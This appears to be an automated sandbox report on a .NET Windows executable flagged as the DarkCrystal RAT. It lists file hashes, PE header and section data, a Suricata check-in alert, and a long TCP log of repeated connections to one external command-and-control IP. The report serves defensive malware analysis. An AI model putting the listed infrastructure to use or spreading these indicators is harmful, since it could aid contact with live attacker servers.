                                                            SHA512:3e0a40959eaba1fbf3cb7a11707bc658421f3066e4e1beea56088ac213c10524127d4d9e2500e549a1ee608887c113973892d54fb91fae6ea9db4eb9e818bebe
                                                            SSDEEP:98304:sALvAvoV3JDBQSBK5f7a6uBt9iofavIa:smvvV5DpQ7a6ugoCvI
                                                            TLSH:9106F019A5928E36C2645732C297453D52D0D3363652EB0F361F24D2AD0BBF2AF762E3
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....tUg.................p8...........8.. ....8...@.. ........................8...........@................................

                                                            File Icon

                                                            Icon Hash:90cececece8e8eb0

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x788f0e
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x675574EF [Sun Dec 8 10:29:03 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                            Entrypoint Preview

                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x388ec00x4b.text
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x38a0000x320.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x38c0000xc.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x20000x386f140x3870007485b124297f9f7f2c92f4d68711992eunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rsrc0x38a0000x3200x400d5d56b53a3d8bd8ef3235020baab9faeFalse0.353515625data2.6517752881589467IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .reloc0x38c0000xc0x200d5b912767e7d6031850cc8f9b33906ceFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_VERSION0x38a0580x2c8data0.46207865168539325

                                                            Imports

                                                            DLLImport
                                                            mscoree.dll_CorExeMain

                                                            Network Behavior

                                                            Suricata IDS Alerts

                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2024-12-15T19:36:25.013442+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449738104.21.64.13080TCP

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 15, 2024 19:36:23.764467001 CET4973880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:23.884526014 CET8049738104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:23.884808064 CET4973880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:23.885973930 CET4973880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:24.005908966 CET8049738104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:24.233082056 CET4973880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:24.354111910 CET8049738104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:24.972141981 CET8049738104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:25.013442039 CET4973880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:25.241660118 CET8049738104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:25.241697073 CET8049738104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:25.241964102 CET4973880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:25.314455986 CET4973880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:25.413443089 CET4974080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:25.434254885 CET8049738104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:25.533292055 CET8049740104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:25.533497095 CET4974080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:25.533586979 CET4974080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:25.629704952 CET8049738104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:25.630789995 CET4973880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:25.654011965 CET8049740104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:25.750900030 CET8049738104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:25.888679981 CET4974080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:26.010888100 CET8049740104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:26.010909081 CET8049740104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:26.010960102 CET8049740104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:26.105432987 CET8049738104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:26.148133039 CET4973880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:26.269855976 CET8049738104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:26.465931892 CET8049738104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:26.466133118 CET4973880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:26.586880922 CET8049738104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:26.587760925 CET8049738104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:26.626297951 CET8049740104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:26.669677019 CET4974080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:26.869967937 CET8049740104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:26.919684887 CET4974080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:26.995726109 CET8049738104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:27.006078005 CET4973880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:27.125936985 CET8049738104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:27.320672989 CET8049738104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:27.320895910 CET4973880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:27.441346884 CET8049738104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:27.441373110 CET8049738104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:27.441401005 CET8049738104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:27.842607975 CET8049738104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:27.888679981 CET4973880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:27.976033926 CET4974280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:27.978018999 CET4973880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:27.978321075 CET4974080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:28.095860004 CET8049742104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:28.095983982 CET4974280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:28.096306086 CET4974280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:28.098100901 CET8049738104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:28.098160982 CET4973880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:28.098645926 CET8049740104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:28.098709106 CET4974080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:28.217022896 CET8049742104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:28.451329947 CET4974280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:28.571388006 CET8049742104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:28.571480036 CET8049742104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:28.571513891 CET8049742104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:29.184340000 CET8049742104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:29.233993053 CET4974280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:29.537604094 CET8049742104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:29.593986034 CET4974280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:29.729270935 CET8049742104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:29.741234064 CET4974280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:29.975130081 CET8049742104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:29.975199938 CET4974280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:30.066134930 CET4974580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:30.186410904 CET8049745104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:30.186508894 CET4974580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:30.186753988 CET4974580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:30.308741093 CET8049745104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:30.547542095 CET4974580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:30.667507887 CET8049745104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:30.667593002 CET8049745104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:30.667602062 CET8049745104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:31.278477907 CET8049745104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:31.325953007 CET4974580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:31.543986082 CET8049745104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:31.591574907 CET4974580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:31.669461966 CET4974580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:31.670531034 CET4974780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:31.789661884 CET8049745104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:31.789757967 CET4974580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:31.790432930 CET8049747104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:31.790519953 CET4974780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:31.790682077 CET4974780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:31.910422087 CET8049747104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:31.910562038 CET8049747104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:31.919985056 CET4974880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:32.014301062 CET4974980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:32.039784908 CET8049748104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:32.039887905 CET4974880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:32.134623051 CET8049749104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:32.134716034 CET4974980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:32.134924889 CET4974980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:32.183593988 CET4975080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:32.254610062 CET8049749104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:32.303673029 CET8049750104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:32.303771973 CET4975080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:32.304044962 CET4975080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:32.425785065 CET8049750104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:32.482455969 CET4974980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:32.603600025 CET8049749104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:32.603622913 CET8049749104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:32.654339075 CET4975080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:32.774296045 CET8049750104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:32.774312019 CET8049750104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:32.774348974 CET8049750104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:33.222235918 CET8049749104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:33.263443947 CET4974980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:33.391849041 CET8049750104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:33.435348034 CET4975080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:33.534456015 CET8049749104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:33.575957060 CET4974980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:33.632921934 CET8049750104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:33.685328007 CET4975080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:33.726315022 CET8049749104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:33.764421940 CET4975080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:33.764513969 CET4974980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:33.764596939 CET4974880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:33.770478964 CET4975280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:33.890492916 CET8049752104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:33.890572071 CET4975280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:33.890738010 CET4975280192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:34.012389898 CET8049752104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:34.012511015 CET8049752104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:34.014756918 CET4975380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:34.141474962 CET8049753104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:34.141802073 CET4975380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:34.141935110 CET4975380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:34.267280102 CET8049753104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:34.498130083 CET4975380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:34.618002892 CET8049753104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:34.618030071 CET8049753104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:34.618045092 CET8049753104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:35.236308098 CET8049753104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:35.279061079 CET4975380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:35.782630920 CET8049753104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:35.825931072 CET4975380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:35.898464918 CET4975380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:35.899162054 CET4975480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:36.019686937 CET8049754104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:36.019738913 CET8049753104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:36.019829035 CET4975480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:36.020024061 CET4975480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:36.020045042 CET4975380192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:36.141222000 CET8049754104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:36.372960091 CET4975480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:36.492867947 CET8049754104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:36.492902040 CET8049754104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:36.492937088 CET8049754104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:37.144916058 CET8049754104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:37.200997114 CET4975480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:37.383358002 CET8049754104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:37.435324907 CET4975480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:37.513854027 CET4975480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:37.514813900 CET4975580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:37.635184050 CET8049754104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:37.635260105 CET4975480192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:37.635649920 CET8049755104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:37.635737896 CET4975580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:37.635854959 CET4975580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:37.755644083 CET8049755104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:37.982553959 CET4975580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:38.103708982 CET8049755104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:38.103753090 CET8049755104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:38.103790998 CET8049755104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:38.727225065 CET8049755104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:38.734107971 CET4975680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:38.779201031 CET4975580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:38.860122919 CET8049756104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:38.860342026 CET4975680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:38.860690117 CET4975680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:38.980468035 CET8049756104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:38.992369890 CET8049755104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:39.044838905 CET4975580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:39.129533052 CET4975580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:39.130373955 CET4975780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:39.216974974 CET4975680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:39.249936104 CET8049755104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:39.250093937 CET4975580192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:39.250190973 CET8049757104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:39.250278950 CET4975780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:39.250420094 CET4975780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:39.337249994 CET8049756104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:39.337403059 CET8049756104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:39.371138096 CET8049757104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:39.607448101 CET4975780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:39.728540897 CET8049757104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:39.729022026 CET8049757104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:39.729051113 CET8049757104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:40.002067089 CET8049756104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:40.044955015 CET4975680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:40.242865086 CET8049756104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:40.294692993 CET4975680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:40.352747917 CET8049757104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:40.404083967 CET4975780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:40.602191925 CET8049757104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:40.654233932 CET4975780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:40.727544069 CET4975680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:40.727787971 CET4975780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:40.741142035 CET4975880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:40.889269114 CET8049756104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:40.889386892 CET4975680192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:40.891638041 CET8049757104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:40.891649961 CET8049758104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:40.891695023 CET4975780192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:40.891731977 CET4975880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:40.891896009 CET4975880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:41.011626005 CET8049758104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:41.247925043 CET4975880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:41.369085073 CET8049758104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:41.369110107 CET8049758104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:41.369276047 CET8049758104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:41.979324102 CET8049758104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:42.029227018 CET4975880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:42.223402977 CET8049758104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:42.263475895 CET4975880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:42.354280949 CET4975880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:42.354980946 CET4975980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:42.480531931 CET8049758104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:42.480804920 CET8049759104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:42.480827093 CET4975880192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:42.481076002 CET4975980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:42.481076002 CET4975980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:42.600855112 CET8049759104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:42.826088905 CET4975980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:42.946578026 CET8049759104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:42.946620941 CET8049759104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:42.946650982 CET8049759104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:43.572362900 CET8049759104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:43.622817039 CET4975980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:43.808235884 CET8049759104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:43.857337952 CET4975980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:43.935954094 CET4975980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:43.936511040 CET4976080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:44.056478977 CET8049759104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:44.056526899 CET8049760104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:44.056781054 CET4975980192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:44.056807041 CET4976080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:44.056881905 CET4976080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:44.176749945 CET8049760104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:44.404248953 CET4976080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:44.525130987 CET8049760104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:44.525177956 CET8049760104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:44.525208950 CET8049760104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:45.143028975 CET8049760104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:45.185565948 CET4976080192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:45.249335051 CET4976180192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:45.369398117 CET8049761104.21.64.130192.168.2.4
                                                            Dec 15, 2024 19:36:45.369477987 CET4976180192.168.2.4104.21.64.130
                                                            Dec 15, 2024 19:36:45.369661093 CET4976180192.168.2.4104.21.64.130
